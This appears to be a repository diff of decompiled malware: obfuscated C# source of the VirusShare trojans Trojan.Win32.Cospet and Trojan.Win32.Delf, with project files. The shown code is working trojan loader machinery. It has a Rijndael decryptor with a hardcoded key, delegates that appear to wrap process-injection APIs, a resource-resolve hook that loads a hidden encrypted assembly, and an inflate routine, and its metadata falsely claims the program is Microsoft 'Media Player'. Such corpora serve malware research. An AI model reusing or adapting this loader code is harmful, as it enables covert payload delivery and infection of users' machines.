(byte) 6,
(byte) 5,
(byte) 4,
(byte) 3,
(byte) 2,
(byte) 1,
(byte) 9,
(byte) 8,
(byte) 7,
(byte) 6,
(byte) 5,
(byte) 4,
(byte) 3,
(byte) 2,
(byte) 1
};
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(obj0, 0, obj0.Length);
}
}
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool \u0039klfPRdkUkcORZqXqJ(
[In] string obj0,
[In] StringBuilder obj1,
[In] IntPtr obj2,
[In] IntPtr obj3,
[MarshalAs(UnmanagedType.Bool)] bool _param5,
[In] int obj5,
[In] IntPtr obj6,
[In] string obj7,
[In] byte[] obj8,
[In] IntPtr[] obj9);
public delegate bool qgK3lty9wFb990IxNy(
[In] IntPtr obj0,
[In] IntPtr obj1,
[In] byte[] obj2,
[In] uint obj3,
[In] int obj4);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool DR45xqt8vapkmdO5jX(
[In] IntPtr obj0,
[In] IntPtr obj1,
[In] ref IntPtr obj2,
[In] int obj3,
[In] ref IntPtr obj4);
public delegate IntPtr ZfvhinbtZbMtI7F6cm(
[In] IntPtr obj0,
[In] IntPtr obj1,
[In] IntPtr obj2,
[In] int obj3,
[In] int obj4);
public delegate uint \u00331cnlp5hhg963mPuNg([In] IntPtr obj0, [In] IntPtr obj1);
public delegate uint Ayi64li1PRJMwO41ZT([In] IntPtr obj0);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool r9hFs0ZTHQaZ334oHv([In] IntPtr obj0, [In] uint[] obj1);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool hEqihWru9Nn70v7FBD([In] IntPtr obj0, [In] uint[] obj1);
}
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/_003CModule_003E{81A84E1E-6409-4B9D-B789-B9B5420A3.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: <Module>{81A84E1E-6409-4B9D-B789-B9B5420A38D1}
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
internal class \u003CModule\u003E\u007B81A84E1E\u002D6409\u002D4B9D\u002DB789\u002DB9B5420A38D1\u007D
{
}
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/d0185bd7-034e-41ef-aec0-b5a6ab327d87
BIN
View File
Binary file not shown.
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/dIB5tm1fm4ourlbe9N/YbbxknoBYLxEOxk0Pn.cs
+2762
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/lIMo5cXu7QVSJ7hdyJ/tcJNIpeNWph4hwAAuQ.cs
+2197
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan/Win32/C/Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807/wuZRSCSYdAj3YejFZe/DcHwE30dMCeD7BI4om.cs
+30
View File
@@ -0,0 +1,30 @@
// Decompiled with JetBrains decompiler
// Type: wuZRSCSYdAj3YejFZe.DcHwE30dMCeD7BI4om
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using TmwCXiWu118CwLLcBx;
namespace wuZRSCSYdAj3YejFZe
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class DcHwE30dMCeD7BI4om : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
[MethodImpl(MethodImplOptions.NoInlining)]
public DcHwE30dMCeD7BI4om()
{
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
// ISSUE: explicit constructor call
base.\u002Ector();
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/AssemblyInfo.cs
+12
View File
@@ -0,0 +1,12 @@
using SmartAssembly.Attributes;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Media Player")]
[assembly: AssemblyCopyright("Copyright © Microsoft 2010")]
[assembly: PoweredBy("Powered by {smartassembly}")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyProduct("Media Player")]
[assembly: Guid("47dbf2b9-d51b-4b30-ad47-d3a2cd5e8f11")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/SmartAssembly/Attributes/PoweredByAttribute.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.PoweredByAttribute
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
namespace SmartAssembly.Attributes
{
public sealed class PoweredByAttribute : Attribute
{
public PoweredByAttribute(string s)
{
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/Trojan.Win32.Delf.cjha.csproj
+58
View File
@@ -0,0 +1,58 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{8A25B7D5-4EB6-4736-8F47-C115A1490D57}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Explorer</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="_0005\_0001.cs" />
<Compile Include="_0005\_0002.cs" />
<Compile Include="_0001\_0001.cs" />
<Compile Include="_0001\_0002.cs" />
<Compile Include="_0001\_0003.cs" />
<Compile Include="_0003\_0001.cs" />
<Compile Include="_0003\_0002.cs" />
<Compile Include="_0003\_0003.cs" />
<Compile Include="_0002\_0001.cs" />
<Compile Include="_0002\_0002.cs" />
<Compile Include="_0002\_0003.cs" />
<Compile Include="SmartAssembly\Attributes\PoweredByAttribute.cs" />
<Compile Include="_0004\_0001.cs" />
<Compile Include="_0004\_0002.cs" />
<Compile Include="_0004\_0003.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="{56732c33-a8ea-48e2-a548-0239f4aa8a0c}" />
<EmbeddedResource Include="{9ebaca4b-5cc4-4e1d-bb8b-a34a1921d651}" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/Trojan.Win32.Delf.cjha.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Explorer", "Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.csproj", "{8A25B7D5-4EB6-4736-8F47-C115A1490D57}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8A25B7D5-4EB6-4736-8F47-C115A1490D57}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8A25B7D5-4EB6-4736-8F47-C115A1490D57}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8A25B7D5-4EB6-4736-8F47-C115A1490D57}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8A25B7D5-4EB6-4736-8F47-C115A1490D57}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0001/_0001.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0001
{
internal sealed class \u0001
{
private static Stream \u0001;
private static int \u0001 = 0;
public static string \u0003([In] int obj0)
{
byte[] numArray;
lock (typeof (\u0001.\u0001))
{
if (\u0001.\u0001.\u0001 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
\u0001.\u0001.\u0001 = executingAssembly.GetManifestResourceStream(executingAssembly.ManifestModule.ModuleVersionId.ToString("B"));
byte[] publicKeyToken = executingAssembly.GetName().GetPublicKeyToken();
if (publicKeyToken != null)
{
for (int index = 0; index < publicKeyToken.Length - 1; index += 2)
\u0001.\u0001.\u0001 ^= ((int) publicKeyToken[index] << 8) + (int) publicKeyToken[index + 1];
}
int num = ((MethodBase.GetCurrentMethod().MetadataToken & 16777215) - 1) % (int) ushort.MaxValue;
\u0001.\u0001.\u0001 ^= num;
}
\u0001.\u0001.\u0001.Position = (long) (obj0 - \u0001.\u0001.\u0001);
int num1 = \u0001.\u0001.\u0001.ReadByte();
int count = (num1 & 128) != 0 ? ((num1 & 64) != 0 ? ((num1 & 31) << 24) + (\u0001.\u0001.\u0001.ReadByte() << 16) + (\u0001.\u0001.\u0001.ReadByte() << 8) + \u0001.\u0001.\u0001.ReadByte() : ((num1 & 63) << 8) + \u0001.\u0001.\u0001.ReadByte()) : num1;
numArray = new byte[count];
\u0001.\u0001.\u0001.Read(numArray, 0, count);
}
if (numArray.Length == 0)
return string.Empty;
byte[] bytes = Convert.FromBase64String(Encoding.UTF8.GetString(numArray, 0, numArray.Length));
return string.Intern(Encoding.UTF8.GetString(bytes, 0, bytes.Length));
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0001/_0002.cs
+16
View File
@@ -0,0 +1,16 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0001;
using System;
namespace \u0001
{
internal class \u0002
{
public static void \u0003() => AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u0003.\u0003);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0001/_0003.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0001;
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0001
{
internal class \u0003
{
private static Assembly \u0001;
internal static Assembly \u0003([In] object obj0, [In] ResolveEventArgs obj1)
{
if ((object) \u0003.\u0001 == null)
\u0003.\u0001 = Assembly.Load(\u0001.\u0001.\u0003(42851));
return \u0003.\u0001;
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0002/_0001.cs
+922
View File
@@ -0,0 +1,922 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace \u0002
{
internal class \u0001
{
public static byte[] \u0003([In] byte[] obj0)
{
\u0002.\u0001.\u0006 obj1 = new \u0002.\u0001.\u0006(obj0);
byte[] numArray1 = new byte[0];
int num1 = obj1.\u0004();
byte[] numArray2;
switch (num1)
{
case 25000571:
int length1 = obj1.\u0004();
numArray2 = new byte[length1];
int num2;
for (int index = 0; index < length1; index += num2)
{
int length2 = obj1.\u0004();
num2 = obj1.\u0004();
byte[] buffer = new byte[length2];
obj1.Read(buffer, 0, buffer.Length);
new \u0002.\u0001.\u0001(buffer).\u0003(numArray2, index, num2);
}
break;
case 67324752:
short num3 = (short) obj1.\u0003();
int num4 = obj1.\u0003();
int num5 = obj1.\u0003();
if (num1 != 67324752 || num3 != (short) 20 || num4 != 0 || num5 != 8)
throw new FormatException(\u0001.\u0001.\u0003(42948));
obj1.\u0004();
obj1.\u0004();
obj1.\u0004();
int length3 = obj1.\u0004();
int count1 = obj1.\u0003();
int count2 = obj1.\u0003();
if (count1 > 0)
{
byte[] buffer = new byte[count1];
obj1.Read(buffer, 0, count1);
}
if (count2 > 0)
{
byte[] buffer = new byte[count2];
obj1.Read(buffer, 0, count2);
}
byte[] buffer1 = new byte[obj1.Length - obj1.Position];
obj1.Read(buffer1, 0, buffer1.Length);
\u0002.\u0001.\u0001 obj2 = new \u0002.\u0001.\u0001(buffer1);
numArray2 = new byte[length3];
obj2.\u0003(numArray2, 0, numArray2.Length);
break;
default:
throw new FormatException(\u0001.\u0001.\u0003(42981));
}
obj1.Close();
return numArray2;
}
internal class \u0001
{
private static int[] \u0001 = new int[29]
{
3,
4,
5,
6,
7,
8,
9,
10,
11,
13,
15,
17,
19,
23,
27,
31,
35,
43,
51,
59,
67,
83,
99,
115,
131,
163,
195,
227,
258
};
private static int[] \u0002 = new int[29]
{
0,
0,
0,
0,
0,
0,
0,
0,
1,
1,
1,
1,
2,
2,
2,
2,
3,
3,
3,
3,
4,
4,
4,
4,
5,
5,
5,
5,
0
};
private static int[] \u0003 = new int[30]
{
1,
2,
3,
4,
5,
7,
9,
13,
17,
25,
33,
49,
65,
97,
129,
193,
257,
385,
513,
769,
1025,
1537,
2049,
3073,
4097,
6145,
8193,
12289,
16385,
24577
};
private static int[] \u0004 = new int[30]
{
0,
0,
0,
0,
1,
1,
2,
2,
3,
3,
4,
4,
5,
5,
6,
6,
7,
7,
8,
8,
9,
9,
10,
10,
11,
11,
12,
12,
13,
13
};
private int \u0001;
private int \u0002;
private int \u0003;
private int \u0004;
private int \u0005;
private bool \u0001;
private \u0002.\u0001.\u0002 \u0001;
private \u0002.\u0001.\u0003 \u0001;
private \u0002.\u0001.\u0005 \u0001;
private \u0002.\u0001.\u0004 \u0001;
private \u0002.\u0001.\u0004 \u0002;
public \u0001([In] byte[] obj0)
{
this.\u0001 = new \u0002.\u0001.\u0002();
this.\u0001 = new \u0002.\u0001.\u0003();
this.\u0001 = 2;
this.\u0001.\u0003(obj0, 0, obj0.Length);
}
private bool \u0003()
{
int num1 = this.\u0001.\u0003();
while (num1 >= 258)
{
switch (this.\u0001)
{
case 7:
int num2;
while (((num2 = this.\u0001.\u0003(this.\u0001)) & -256) == 0)
{
this.\u0001.\u0003(num2);
if (--num1 < 258)
return true;
}
if (num2 < 257)
{
if (num2 < 0)
return false;
this.\u0002 = (\u0002.\u0001.\u0004) null;
this.\u0001 = (\u0002.\u0001.\u0004) null;
this.\u0001 = 2;
return true;
}
this.\u0003 = \u0002.\u0001.\u0001.\u0001[num2 - 257];
this.\u0002 = \u0002.\u0001.\u0001.\u0002[num2 - 257];
goto case 8;
case 8:
if (this.\u0002 > 0)
{
this.\u0001 = 8;
int num3 = this.\u0001.\u0003(this.\u0002);
if (num3 < 0)
return false;
this.\u0001.\u0003(this.\u0002);
this.\u0003 += num3;
}
this.\u0001 = 9;
goto case 9;
case 9:
int index = this.\u0002.\u0003(this.\u0001);
if (index < 0)
return false;
this.\u0004 = \u0002.\u0001.\u0001.\u0003[index];
this.\u0002 = \u0002.\u0001.\u0001.\u0004[index];
goto case 10;
case 10:
if (this.\u0002 > 0)
{
this.\u0001 = 10;
int num4 = this.\u0001.\u0003(this.\u0002);
if (num4 < 0)
return false;
this.\u0001.\u0003(this.\u0002);
this.\u0004 += num4;
}
this.\u0001.\u0003(this.\u0003, this.\u0004);
num1 -= this.\u0003;
this.\u0001 = 7;
continue;
default:
continue;
}
}
return true;
}
private bool \u0004()
{
switch (this.\u0001)
{
case 2:
if (this.\u0001)
{
this.\u0001 = 12;
return false;
}
int num = this.\u0001.\u0003(3);
if (num < 0)
return false;
this.\u0001.\u0003(3);
if ((num & 1) != 0)
this.\u0001 = true;
switch (num >> 1)
{
case 0:
this.\u0001.\u0003();
this.\u0001 = 3;
break;
case 1:
this.\u0001 = \u0002.\u0001.\u0004.\u0001;
this.\u0002 = \u0002.\u0001.\u0004.\u0002;
this.\u0001 = 7;
break;
case 2:
this.\u0001 = new \u0002.\u0001.\u0005();
this.\u0001 = 6;
break;
}
return true;
case 3:
if ((this.\u0005 = this.\u0001.\u0003(16)) < 0)
return false;
this.\u0001.\u0003(16);
this.\u0001 = 4;
goto case 4;
case 4:
if (this.\u0001.\u0003(16) < 0)
return false;
this.\u0001.\u0003(16);
this.\u0001 = 5;
goto case 5;
case 5:
this.\u0005 -= this.\u0001.\u0003(this.\u0001, this.\u0005);
if (this.\u0005 != 0)
return !this.\u0001.\u0003();
this.\u0001 = 2;
return true;
case 6:
if (!this.\u0001.\u0003(this.\u0001))
return false;
this.\u0001 = this.\u0001.\u0003();
this.\u0002 = this.\u0001.\u0004();
this.\u0001 = 7;
goto case 7;
case 7:
case 8:
case 9:
case 10:
return this.\u0003();
case 12:
return false;
default:
return false;
}
}
public int \u0003([In] byte[] obj0, [In] int obj1, [In] int obj2)
{
int num1 = 0;
do
{
if (this.\u0001 != 11)
goto label_5;
label_2:
continue;
label_5:
int num2 = this.\u0001.\u0003(obj0, obj1, obj2);
obj1 += num2;
num1 += num2;
obj2 -= num2;
if (obj2 != 0)
goto label_2;
else
goto label_1;
}
while (this.\u0004() || this.\u0001.\u0004() > 0 && this.\u0001 != 11);
goto label_3;
label_1:
return num1;
label_3:
return num1;
}
}
internal class \u0002
{
private byte[] \u0001;
private int \u0001;
private int \u0002;
private uint \u0001;
private int \u0003;
public int \u0003([In] int obj0)
{
if (this.\u0003 < obj0)
goto label_4;
label_3:
return (int) ((long) this.\u0001 & (long) ((1 << obj0) - 1));
label_4:
if (this.\u0001 == this.\u0002)
return -1;
this.\u0001 |= (uint) (((int) this.\u0001[this.\u0001++] & (int) byte.MaxValue | ((int) this.\u0001[this.\u0001++] & (int) byte.MaxValue) << 8) << this.\u0003);
this.\u0003 += 16;
goto label_3;
}
public void \u0003([In] int obj0)
{
this.\u0001 >>= obj0;
this.\u0003 -= obj0;
}
[SpecialName]
public int \u0003() => this.\u0003;
[SpecialName]
public int \u0004() => this.\u0002 - this.\u0001 + (this.\u0003 >> 3);
public void \u0003()
{
this.\u0001 >>= this.\u0003 & 7;
this.\u0003 &= -8;
}
[SpecialName]
public bool \u0003() => this.\u0001 == this.\u0002;
public int \u0003([In] byte[] obj0, [In] int obj1, [In] int obj2)
{
int num1 = 0;
while (this.\u0003 > 0 && obj2 > 0)
{
obj0[obj1++] = (byte) this.\u0001;
this.\u0001 >>= 8;
this.\u0003 -= 8;
--obj2;
++num1;
}
if (obj2 == 0)
return num1;
int num2 = this.\u0002 - this.\u0001;
if (obj2 > num2)
obj2 = num2;
Array.Copy((Array) this.\u0001, this.\u0001, (Array) obj0, obj1, obj2);
this.\u0001 += obj2;
if ((this.\u0001 - this.\u0002 & 1) != 0)
{
this.\u0001 = (uint) this.\u0001[this.\u0001++] & (uint) byte.MaxValue;
this.\u0003 = 8;
}
return num1 + obj2;
}
public void \u0003([In] byte[] obj0, [In] int obj1, [In] int obj2)
{
if (this.\u0001 < this.\u0002)
throw new InvalidOperationException();
int num = obj1 + obj2;
if (0 > obj1 || obj1 > num || num > obj0.Length)
throw new ArgumentOutOfRangeException();
if ((obj2 & 1) != 0)
{
this.\u0001 |= (uint) (((int) obj0[obj1++] & (int) byte.MaxValue) << this.\u0003);
this.\u0003 += 8;
}
this.\u0001 = obj0;
this.\u0001 = obj1;
this.\u0002 = num;
}
}
internal class \u0003
{
private static int \u0001 = 32768;
private static int \u0002 = \u0002.\u0001.\u0003.\u0001 - 1;
private byte[] \u0001 = new byte[\u0002.\u0001.\u0003.\u0001];
private int \u0003;
private int \u0004;
public void \u0003([In] int obj0)
{
\u0002.\u0001.\u0003 obj = this;
int num1;
int num2 = num1 = obj.\u0004;
obj.\u0004 = num1 + 1;
if (num2 == \u0002.\u0001.\u0003.\u0001)
throw new InvalidOperationException();
this.\u0001[this.\u0003++] = (byte) obj0;
this.\u0003 &= \u0002.\u0001.\u0003.\u0002;
}
private void \u0003([In] int obj0, [In] int obj1, [In] int obj2)
{
while (obj1-- > 0)
{
byte[] numArray = this.\u0001;
\u0002.\u0001.\u0003 obj = this;
int num1;
int num2 = num1 = obj.\u0003;
obj.\u0003 = num1 + 1;
int index = num2;
int num3 = (int) this.\u0001[obj0++];
numArray[index] = (byte) num3;
this.\u0003 &= \u0002.\u0001.\u0003.\u0002;
obj0 &= \u0002.\u0001.\u0003.\u0002;
}
}
public void \u0003([In] int obj0, [In] int obj1)
{
if ((this.\u0004 += obj0) > \u0002.\u0001.\u0003.\u0001)
throw new InvalidOperationException();
int sourceIndex = this.\u0003 - obj1 & \u0002.\u0001.\u0003.\u0002;
int num = \u0002.\u0001.\u0003.\u0001 - obj0;
if (sourceIndex <= num && this.\u0003 < num)
{
if (obj0 <= obj1)
{
Array.Copy((Array) this.\u0001, sourceIndex, (Array) this.\u0001, this.\u0003, obj0);
this.\u0003 += obj0;
}
else
{
while (obj0-- > 0)
this.\u0001[this.\u0003++] = this.\u0001[sourceIndex++];
}
}
else
this.\u0003(sourceIndex, obj0, obj1);
}
public int \u0003([In] \u0002.\u0001.\u0002 obj0, [In] int obj1)
{
obj1 = Math.Min(Math.Min(obj1, \u0002.\u0001.\u0003.\u0001 - this.\u0004), obj0.\u0004());
int num1 = \u0002.\u0001.\u0003.\u0001 - this.\u0003;
int num2;
if (obj1 > num1)
{
num2 = obj0.\u0003(this.\u0001, this.\u0003, num1);
if (num2 == num1)
num2 += obj0.\u0003(this.\u0001, 0, obj1 - num1);
}
else
num2 = obj0.\u0003(this.\u0001, this.\u0003, obj1);
this.\u0003 = this.\u0003 + num2 & \u0002.\u0001.\u0003.\u0002;
this.\u0004 += num2;
return num2;
}
public int \u0003() => \u0002.\u0001.\u0003.\u0001 - this.\u0004;
public int \u0004() => this.\u0004;
public int \u0003([In] byte[] obj0, [In] int obj1, [In] int obj2)
{
int num1 = this.\u0003;
if (obj2 > this.\u0004)
obj2 = this.\u0004;
else
num1 = this.\u0003 - this.\u0004 + obj2 & \u0002.\u0001.\u0003.\u0002;
int num2 = obj2;
int length = obj2 - num1;
if (length > 0)
{
Array.Copy((Array) this.\u0001, \u0002.\u0001.\u0003.\u0001 - length, (Array) obj0, obj1, length);
obj1 += length;
obj2 = num1;
}
Array.Copy((Array) this.\u0001, num1 - obj2, (Array) obj0, obj1, obj2);
this.\u0004 -= num2;
if (this.\u0004 < 0)
throw new InvalidOperationException();
return num2;
}
}
internal class \u0004
{
private static byte[] \u0001 = new byte[16]
{
(byte) 0,
(byte) 8,
(byte) 4,
(byte) 12,
(byte) 2,
(byte) 10,
(byte) 6,
(byte) 14,
(byte) 1,
(byte) 9,
(byte) 5,
(byte) 13,
(byte) 3,
(byte) 11,
(byte) 7,
(byte) 15
};
private static int \u0001 = 15;
private short[] \u0001;
public static \u0002.\u0001.\u0004 \u0001;
public static \u0002.\u0001.\u0004 \u0002;
static \u0004()
{
byte[] numArray1 = new byte[288];
int num1 = 0;
while (num1 < 144)
numArray1[num1++] = (byte) 8;
while (num1 < 256)
numArray1[num1++] = (byte) 9;
while (num1 < 280)
numArray1[num1++] = (byte) 7;
while (num1 < 288)
numArray1[num1++] = (byte) 8;
\u0002.\u0001.\u0004.\u0001 = new \u0002.\u0001.\u0004(numArray1);
byte[] numArray2 = new byte[32];
int num2 = 0;
while (num2 < 32)
numArray2[num2++] = (byte) 5;
\u0002.\u0001.\u0004.\u0002 = new \u0002.\u0001.\u0004(numArray2);
}
public \u0004([In] byte[] obj0) => this.\u0003(obj0);
public static short \u0003([In] int obj0) => (short) ((int) \u0002.\u0001.\u0004.\u0001[obj0 & 15] << 12 | (int) \u0002.\u0001.\u0004.\u0001[obj0 >> 4 & 15] << 8 | (int) \u0002.\u0001.\u0004.\u0001[obj0 >> 8 & 15] << 4 | (int) \u0002.\u0001.\u0004.\u0001[obj0 >> 12]);
private void \u0003([In] byte[] obj0)
{
int[] numArray1 = new int[\u0002.\u0001.\u0004.\u0001 + 1];
int[] numArray2 = new int[\u0002.\u0001.\u0004.\u0001 + 1];
for (int index1 = 0; index1 < obj0.Length; ++index1)
{
int index2 = (int) obj0[index1];
if (index2 > 0)
++numArray1[index2];
}
int num1 = 0;
int length = 512;
for (int index = 1; index <= \u0002.\u0001.\u0004.\u0001; ++index)
{
numArray2[index] = num1;
num1 += numArray1[index] << 16 - index;
if (index >= 10)
{
int num2 = numArray2[index] & 130944;
int num3 = num1 & 130944;
length += num3 - num2 >> 16 - index;
}
}
this.\u0001 = new short[length];
int num4 = 512;
for (int index3 = \u0002.\u0001.\u0004.\u0001; index3 >= 10; --index3)
{
int num5 = num1 & 130944;
num1 -= numArray1[index3] << 16 - index3;
for (int index4 = num1 & 130944; index4 < num5; index4 += 128)
{
this.\u0001[(int) \u0002.\u0001.\u0004.\u0003(index4)] = (short) (-num4 << 4 | index3);
num4 += 1 << index3 - 9;
}
}
for (int index5 = 0; index5 < obj0.Length; ++index5)
{
int index6 = (int) obj0[index5];
if (index6 != 0)
{
int num6 = numArray2[index6];
int index7 = (int) \u0002.\u0001.\u0004.\u0003(num6);
if (index6 <= 9)
{
do
{
this.\u0001[index7] = (short) (index5 << 4 | index6);
index7 += 1 << index6;
}
while (index7 < 512);
}
else
{
int num7 = (int) this.\u0001[index7 & 511];
int num8 = 1 << (num7 & 15);
int num9 = -(num7 >> 4);
do
{
this.\u0001[num9 | index7 >> 9] = (short) (index5 << 4 | index6);
index7 += 1 << index6;
}
